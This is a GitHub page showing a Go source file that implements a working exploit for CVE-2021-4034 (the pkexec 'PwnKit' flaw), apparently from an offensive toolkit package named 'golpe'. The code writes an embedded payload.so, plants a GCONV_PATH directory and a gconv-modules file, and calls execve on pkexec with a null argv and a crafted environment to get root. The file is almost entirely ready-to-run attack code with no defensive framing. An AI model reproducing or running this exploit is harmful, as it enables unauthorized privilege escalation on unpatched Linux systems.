-
Notifications
You must be signed in to change notification settings - Fork 8
/
Copy pathCVE-2021-4034.go
109 lines (97 loc) · 2.71 KB
/
CVE-2021-4034.go
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
package golpe
import (
"errors"
"fmt"
"log"
"os"
"os/exec"
"syscall"
"unsafe"
)
// a Go approach
func CVE_2021_4034() (err error) {
var (
argv []string = nil
envv = []string{
"lol",
"PATH=GCONV_PATH=.",
"LC_MESSAGES=en_US.UTF-8",
"XAUTHORITY=../LOL",
}
gconv_path_eq = "GCONV_PATH=."
gconv_module_content = "module UTF-8// INTERNAL ../payload 2\n"
)
// prepare payload.so
data, err := ExtractFileFromString(so_data)
if err != nil {
return fmt.Errorf("ExtractFileFromString: %v", err)
}
// write payload.so
if len(data) == 0 {
return fmt.Errorf("failed to decompress payload.so")
}
err = os.WriteFile("payload.so", data, 0777)
if err != nil {
return fmt.Errorf("write payload.so: %v", err)
}
defer os.RemoveAll("payload.so")
// fuck with env
if _, err = os.Stat(gconv_path_eq); err != nil {
if err = os.Mkdir(gconv_path_eq, 0755); err != nil {
return fmt.Errorf("mkdir %s: %v", gconv_path_eq, err)
}
defer os.RemoveAll(gconv_path_eq)
_, err = os.Create(gconv_path_eq + "/lol")
if err != nil {
return
}
// without +x bit, pkexec complains no such file or directory
err = os.Chmod(gconv_path_eq+"/lol", 0755)
if err != nil {
return fmt.Errorf("chmod lol: %v", err)
}
}
// gconv-modules
if _, err = os.Stat("lol"); err != nil {
if err = os.Mkdir("lol", 0755); err != nil {
return fmt.Errorf("mkdir lol: %v", err)
}
/*
Returning to the example above where one has written a module to directly convert from ISO-2022-JP to EUC-JP and back. All that has to be done is to put the new module, let its name be `ISO2022JP-EUCJP.so`, in a directory and add a file gconv-modules with the following content in the same directory:
module ISO-2022-JP// EUC-JP// ISO2022JP-EUCJP 1
module EUC-JP// ISO-2022-JP// ISO2022JP-EUCJP 1
*/
err = os.WriteFile("lol/gconv-modules", []byte(gconv_module_content), 0777)
if err != nil {
return fmt.Errorf("write gconv-modules: %v", err)
}
}
// run pkexec
pkexec_path, err := exec.LookPath("pkexec")
if err != nil {
return
}
argv0 := pkexec_path
argv0p, err := syscall.BytePtrFromString(argv0)
if err != nil {
return fmt.Errorf("argv0p: %v", err)
}
envvp, err := syscall.SlicePtrFromStrings(envv)
if err != nil {
return fmt.Errorf("envvp: %v", err)
}
envv = []string{
"lol",
"PATH=GCONV_PATH=.",
"LC_MESSAGES=en_US.UTF-8",
"XAUTHORITY=../LOL",
"\x00",
}
log.Printf("argv0: %s, envv: %v", argv0, envv)
// child
_, _, err = syscall.RawSyscall(syscall.SYS_EXECVE,
uintptr(unsafe.Pointer(argv0p)),
uintptr(unsafe.Pointer(&argv)),
uintptr(unsafe.Pointer(&envvp[0])))
return errors.New("if you see this, CVE-2021-4034 exploit has failed")
}